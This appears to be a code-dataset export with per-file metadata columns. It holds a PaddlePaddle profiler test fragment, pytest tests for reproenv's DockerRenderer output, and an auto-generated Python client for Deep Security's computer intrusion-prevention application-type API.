with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
try:
profiler.start_profiler('nothing')
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
# for iter in range(10):
# if iter == 2:
# profiler.reset_profiler()
# except each iteration
profiler.stop_profiler('total', './profile')
except ValueError as e:
print(e)
assert True
def test_reset_profiler():
"""
test reset profiler
:return:
"""
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
profiler.start_profiler('All')
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
for iter in range(10):
if iter == 2:
profiler.reset_profiler()
profiler.stop_profiler('total', './profile')
if os.path.exists("./profile"):
assert True
else:
assert False
| 35.738806
| 80
| 0.545939
| 1,074
| 9,578
| 4.758845
| 0.137803
| 0.060262
| 0.086284
| 0.049305
| 0.824692
| 0.824692
| 0.824692
| 0.824692
| 0.824692
| 0.824692
| 0
| 0.031415
| 0.32867
| 9,578
| 267
| 81
| 35.872659
| 0.763453
| 0.133118
| 0
| 0.87766
| 0
| 0
| 0.05617
| 0
| 0
| 0
| 0
| 0
| 0.069149
| 1
| 0.037234
| false
| 0
| 0.021277
| 0
| 0.058511
| 0.005319
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
505282960b806fdc6f5963fe0a75f36963b9ed6a
| 7,465
|
py
|
Python
|
reproenv/tests/test_renderers_docker.py
|
kaczmarj/reproenv
|
a2306a2c79df8415ee0eebf02c46629dbf6260e0
|
[
"Apache-2.0"
] | 1
|
2021-01-06T21:29:21.000Z
|
2021-01-06T21:29:21.000Z
|
reproenv/tests/test_renderers_docker.py
|
kaczmarj/reproenv
|
a2306a2c79df8415ee0eebf02c46629dbf6260e0
|
[
"Apache-2.0"
] | 8
|
2021-01-10T19:10:51.000Z
|
2021-01-22T04:14:40.000Z
|
reproenv/tests/test_renderers_docker.py
|
kaczmarj/reproenv
|
a2306a2c79df8415ee0eebf02c46629dbf6260e0
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from reproenv.exceptions import RendererError
from reproenv.renderers import DockerRenderer
from reproenv.template import Template
def test_docker_renderer_add_template():
r = DockerRenderer("apt")
d = {
"name": "foobar",
"binaries": {
"urls": {"1.0.0": "foobar"},
"env": {"foo": "bar"},
"instructions": "echo hello\necho world",
"arguments": {
"required": [],
"optional": [],
},
"dependencies": {"apt": ["curl"], "debs": [], "yum": ["python"]},
},
}
# Not a Template type.
with pytest.raises(
RendererError, match="template must be an instance of 'Template' but got"
):
r.add_template(d, method="binaries")
# Invalid method
with pytest.raises(
RendererError, match="method must be 'binaries', 'source' but got 'fakemethod"
):
r.add_template(Template(d), method="fakemethod")
# Test apt.
r.add_template(Template(d), method="binaries")
assert len(r._parts) == 2
assert r._parts[0] == 'ENV foo="bar"'
assert (
r._parts[1]
== """RUN apt-get update -qq \\
&& apt-get install -y -q --no-install-recommends \\
curl \\
&& rm -rf /var/lib/apt/lists/* \\
&& echo hello \\
&& echo world"""
)
# Test yum.
r = DockerRenderer("yum")
r.add_template(Template(d), method="binaries")
assert len(r._parts) == 2
assert r._parts[0] == 'ENV foo="bar"'
assert (
r._parts[1]
== """RUN yum install -y -q \\
python \\
&& yum clean all \\
&& rm -rf /var/cache/yum/* \\
&& echo hello \\
&& echo world"""
)
# Test required arguments.
d = {
"name": "foobar",
"binaries": {
"urls": {"1.0.0": "foobar"},
"env": {"foo": "bar"},
"instructions": "echo hello {{ self.name }}",
"arguments": {
"required": ["name"],
"optional": [],
},
"dependencies": {"apt": ["curl"], "debs": [], "yum": ["python"]},
},
}
r = DockerRenderer("apt")
r.add_template(Template(d, binaries_kwds=dict(name="Bjork")), method="binaries")
assert (
str(r)
== """ENV foo="bar"
RUN apt-get update -qq \\
&& apt-get install -y -q --no-install-recommends \\
curl \\
&& rm -rf /var/lib/apt/lists/* \\
&& echo hello Bjork"""
)
d = {
"name": "foobar",
"binaries": {
"urls": {"1.0.0": "foobar"},
"env": {"foo": "bar"},
"instructions": "echo hello {{ self.name | default('foo') }}",
"arguments": {
"required": [],
"optional": ["name"],
},
"dependencies": {"apt": ["curl"], "debs": [], "yum": ["python"]},
},
}
r = DockerRenderer("apt")
r.add_template(Template(d), method="binaries")
assert (
str(r)
== """ENV foo="bar"
RUN apt-get update -qq \\
&& apt-get install -y -q --no-install-recommends \\
curl \\
&& rm -rf /var/lib/apt/lists/* \\
&& echo hello foo"""
)
def test_docker_render_from_instance_methods():
d = DockerRenderer("apt")
d.from_("alpine")
assert str(d) == "FROM alpine"
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
assert str(d) == "FROM alpine AS builder"
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
d.arg("FOO")
assert str(d) == "FROM alpine AS builder\nARG FOO"
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]"""
)
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
d.env(PATH="$PATH:/opt/foo/bin")
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]
ENV PATH="$PATH:/opt/foo/bin\""""
)
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
d.env(PATH="$PATH:/opt/foo/bin")
d.label(ORG="myorg")
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]
ENV PATH="$PATH:/opt/foo/bin"
LABEL ORG="myorg\""""
)
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
d.env(PATH="$PATH:/opt/foo/bin")
d.label(ORG="myorg")
d.run("echo foobar")
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]
ENV PATH="$PATH:/opt/foo/bin"
LABEL ORG="myorg"
RUN echo foobar"""
)
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
d.env(PATH="$PATH:/opt/foo/bin")
d.label(ORG="myorg")
d.run("echo foobar")
d.user("nonroot")
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]
ENV PATH="$PATH:/opt/foo/bin"
LABEL ORG="myorg"
RUN echo foobar
RUN test "$(getent passwd nonroot)" \\
|| useradd --no-user-group --create-home --shell /bin/bash nonroot
USER nonroot"""
)
d = DockerRenderer("apt", users={"root", "nonroot"})
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
d.env(PATH="$PATH:/opt/foo/bin")
d.label(ORG="myorg")
d.run("echo foobar")
d.user("nonroot")
d.workdir("/opt/foobar")
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]
ENV PATH="$PATH:/opt/foo/bin"
LABEL ORG="myorg"
RUN echo foobar
USER nonroot
WORKDIR /opt/foobar"""
)
d = DockerRenderer("apt", users={"root", "nonroot"})
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
d.env(PATH="$PATH:/opt/foo/bin")
d.label(ORG="myorg")
d.run("echo foobar")
d.user("nonroot")
d.workdir("/opt/foobar")
d.run_bash("source activate")
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]
ENV PATH="$PATH:/opt/foo/bin"
LABEL ORG="myorg"
RUN echo foobar
USER nonroot
WORKDIR /opt/foobar
RUN bash -c 'source activate'"""
)
| 25.83045
| 87
| 0.521902
| 932
| 7,465
| 4.127682
| 0.125536
| 0.032753
| 0.057187
| 0.060827
| 0.81674
| 0.784767
| 0.770211
| 0.742657
| 0.732779
| 0.731999
| 0
| 0.002748
| 0.268855
| 7,465
| 288
| 88
| 25.920139
| 0.702089
| 0.010717
| 0
| 0.746154
| 0
| 0.015385
| 0.488278
| 0.029679
| 0
| 0
| 0
| 0
| 0.069231
| 1
| 0.007692
| false
| 0.003846
| 0.015385
| 0
| 0.023077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
acdeb5cbb9e00c545f90adf201bd7eca9a4596e3
| 28,892
|
py
|
Python
|
source/deepsecurity/api/computer_intrusion_prevention_application_type_details_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:09.000Z
|
2021-10-30T16:40:09.000Z
|
source/deepsecurity/api/computer_intrusion_prevention_application_type_details_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-07-28T20:19:03.000Z
|
2021-07-28T20:19:03.000Z
|
source/deepsecurity/api/computer_intrusion_prevention_application_type_details_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:02.000Z
|
2021-10-30T16:40:02.000Z
|
# coding: utf-8
"""
Trend Micro Deep Security API
Copyright 2018 - 2020 Trend Micro Incorporated.<br/>Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501
OpenAPI spec version: 12.5.841
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from deepsecurity.api_client import ApiClient
class ComputerIntrusionPreventionApplicationTypeDetailsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def describe_intrusion_prevention_application_type_on_computer(self, computer_id, application_type_id, api_version, **kwargs): # noqa: E501
"""Describe an intrusion prevention application type # noqa: E501
Describe an intrusion prevention application type including computer-level overrides. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_intrusion_prevention_application_type_on_computer(computer_id, application_type_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param int application_type_id: The ID number of the application type. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only overrides defined for the current computer.
:return: ApplicationType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.describe_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.describe_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, api_version, **kwargs) # noqa: E501
return data
def describe_intrusion_prevention_application_type_on_computer_with_http_info(self, computer_id, application_type_id, api_version, **kwargs): # noqa: E501
"""Describe an intrusion prevention application type # noqa: E501
Describe an intrusion prevention application type including computer-level overrides. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param int application_type_id: The ID number of the application type. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only overrides defined for the current computer.
:return: ApplicationType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['computer_id', 'application_type_id', 'api_version', 'overrides'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method describe_intrusion_prevention_application_type_on_computer" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'computer_id' is set
if ('computer_id' not in params or
params['computer_id'] is None):
raise ValueError("Missing the required parameter `computer_id` when calling `describe_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'application_type_id' is set
if ('application_type_id' not in params or
params['application_type_id'] is None):
raise ValueError("Missing the required parameter `application_type_id` when calling `describe_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `describe_intrusion_prevention_application_type_on_computer`") # noqa: E501
if 'computer_id' in params and not re.search('\\d+', str(params['computer_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `computer_id` when calling `describe_intrusion_prevention_application_type_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
if 'application_type_id' in params and not re.search('\\d+', str(params['application_type_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `application_type_id` when calling `describe_intrusion_prevention_application_type_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'computer_id' in params:
path_params['computerID'] = params['computer_id'] # noqa: E501
if 'application_type_id' in params:
path_params['applicationTypeID'] = params['application_type_id'] # noqa: E501
query_params = []
if 'overrides' in params:
query_params.append(('overrides', params['overrides'])) # noqa: E501
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/computers/{computerID}/intrusionprevention/applicationtypes/{applicationTypeID}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApplicationType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_intrusion_prevention_application_types_on_computer(self, computer_id, api_version, **kwargs): # noqa: E501
"""List intrusion prevention application types # noqa: E501
Lists all intrusion prevention application types assigned to a computer. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_intrusion_prevention_application_types_on_computer(computer_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only application types assigned to the current computer.
:return: ApplicationTypes
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_intrusion_prevention_application_types_on_computer_with_http_info(computer_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.list_intrusion_prevention_application_types_on_computer_with_http_info(computer_id, api_version, **kwargs) # noqa: E501
return data
def list_intrusion_prevention_application_types_on_computer_with_http_info(self, computer_id, api_version, **kwargs): # noqa: E501
"""List intrusion prevention application types # noqa: E501
Lists all intrusion prevention application types assigned to a computer. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_intrusion_prevention_application_types_on_computer_with_http_info(computer_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only application types assigned to the current computer.
:return: ApplicationTypes
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['computer_id', 'api_version', 'overrides'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_intrusion_prevention_application_types_on_computer" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'computer_id' is set
if ('computer_id' not in params or
params['computer_id'] is None):
raise ValueError("Missing the required parameter `computer_id` when calling `list_intrusion_prevention_application_types_on_computer`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `list_intrusion_prevention_application_types_on_computer`") # noqa: E501
if 'computer_id' in params and not re.search('\\d+', str(params['computer_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `computer_id` when calling `list_intrusion_prevention_application_types_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'computer_id' in params:
path_params['computerID'] = params['computer_id'] # noqa: E501
query_params = []
if 'overrides' in params:
query_params.append(('overrides', params['overrides'])) # noqa: E501
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/computers/{computerID}/intrusionprevention/applicationtypes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApplicationTypes', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_intrusion_prevention_application_type_on_computer(self, computer_id, application_type_id, application_type, api_version, **kwargs): # noqa: E501
"""Modify an intrusion prevention application type # noqa: E501
Modify an intrusion prevention application type assigned to a computer. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_intrusion_prevention_application_type_on_computer(computer_id, application_type_id, application_type, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param int application_type_id: The ID number of the application type to modify. (required)
:param ApplicationType application_type: The settings of the application type to modify. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only overrides defined for the current computer.
:return: ApplicationType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.modify_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, application_type, api_version, **kwargs) # noqa: E501
else:
(data) = self.modify_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, application_type, api_version, **kwargs) # noqa: E501
return data
def modify_intrusion_prevention_application_type_on_computer_with_http_info(self, computer_id, application_type_id, application_type, api_version, **kwargs): # noqa: E501
"""Modify an intrusion prevention application type # noqa: E501
Modify an intrusion prevention application type assigned to a computer. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, application_type, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param int application_type_id: The ID number of the application type to modify. (required)
:param ApplicationType application_type: The settings of the application type to modify. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only overrides defined for the current computer.
:return: ApplicationType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['computer_id', 'application_type_id', 'application_type', 'api_version', 'overrides'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_intrusion_prevention_application_type_on_computer" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'computer_id' is set
if ('computer_id' not in params or
params['computer_id'] is None):
raise ValueError("Missing the required parameter `computer_id` when calling `modify_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'application_type_id' is set
if ('application_type_id' not in params or
params['application_type_id'] is None):
raise ValueError("Missing the required parameter `application_type_id` when calling `modify_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'application_type' is set
if ('application_type' not in params or
params['application_type'] is None):
raise ValueError("Missing the required parameter `application_type` when calling `modify_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `modify_intrusion_prevention_application_type_on_computer`") # noqa: E501
if 'computer_id' in params and not re.search('\\d+', str(params['computer_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `computer_id` when calling `modify_intrusion_prevention_application_type_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
if 'application_type_id' in params and not re.search('\\d+', str(params['application_type_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `application_type_id` when calling `modify_intrusion_prevention_application_type_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'computer_id' in params:
path_params['computerID'] = params['computer_id'] # noqa: E501
if 'application_type_id' in params:
path_params['applicationTypeID'] = params['application_type_id'] # noqa: E501
query_params = []
if 'overrides' in params:
query_params.append(('overrides', params['overrides'])) # noqa: E501
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'application_type' in params:
body_params = params['application_type']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/computers/{computerID}/intrusionprevention/applicationtypes/{applicationTypeID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApplicationType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def reset_intrusion_prevention_application_type_on_computer(self, computer_id, application_type_id, api_version, **kwargs): # noqa: E501
"""Reset intrusion prevention application type overrides # noqa: E501
Remove all overrides for an intrusion prevention application type from a computer. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.reset_intrusion_prevention_application_type_on_computer(computer_id, application_type_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param int application_type_id: The ID number of the application type to reset. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only overrides defined for the current computer.
:return: ApplicationType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.reset_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.reset_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, api_version, **kwargs) # noqa: E501
return data
def reset_intrusion_prevention_application_type_on_computer_with_http_info(self, computer_id, application_type_id, api_version, **kwargs): # noqa: E501
"""Reset intrusion prevention application type overrides # noqa: E501
Remove all overrides for an intrusion prevention application type from a computer. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.reset_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param int application_type_id: The ID number of the application type to reset. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only overrides defined for the current computer.
:return: ApplicationType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['computer_id', 'application_type_id', 'api_version', 'overrides'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method reset_intrusion_prevention_application_type_on_computer" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'computer_id' is set
if ('computer_id' not in params or
params['computer_id'] is None):
raise ValueError("Missing the required parameter `computer_id` when calling `reset_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'application_type_id' is set
if ('application_type_id' not in params or
params['application_type_id'] is None):
raise ValueError("Missing the required parameter `application_type_id` when calling `reset_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `reset_intrusion_prevention_application_type_on_computer`") # noqa: E501
if 'computer_id' in params and not re.search('\\d+', str(params['computer_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `computer_id` when calling `reset_intrusion_prevention_application_type_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
if 'application_type_id' in params and not re.search('\\d+', str(params['application_type_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `application_type_id` when calling `reset_intrusion_prevention_application_type_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'computer_id' in params:
path_params['computerID'] = params['computer_id'] # noqa: E501
if 'application_type_id' in params:
path_params['applicationTypeID'] = params['application_type_id'] # noqa: E501
query_params = []
if 'overrides' in params:
query_params.append(('overrides', params['overrides'])) # noqa: E501
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/computers/{computerID}/intrusionprevention/applicationtypes/{applicationTypeID}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApplicationType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 55.032381
| 311
| 0.664613
| 3,375
| 28,892
| 5.415704
| 0.063111
| 0.103403
| 0.103403
| 0.091148
| 0.957982
| 0.956779
| 0.956779
| 0.947587
| 0.942554
| 0.940584
| 0
| 0.014598
| 0.255503
| 28,892
| 524
| 312
| 55.137405
| 0.835146
| 0.335456
| 0
| 0.780488
| 0
| 0
| 0.317367
| 0.119973
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031359
| false
| 0
| 0.013937
| 0
| 0.090592
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
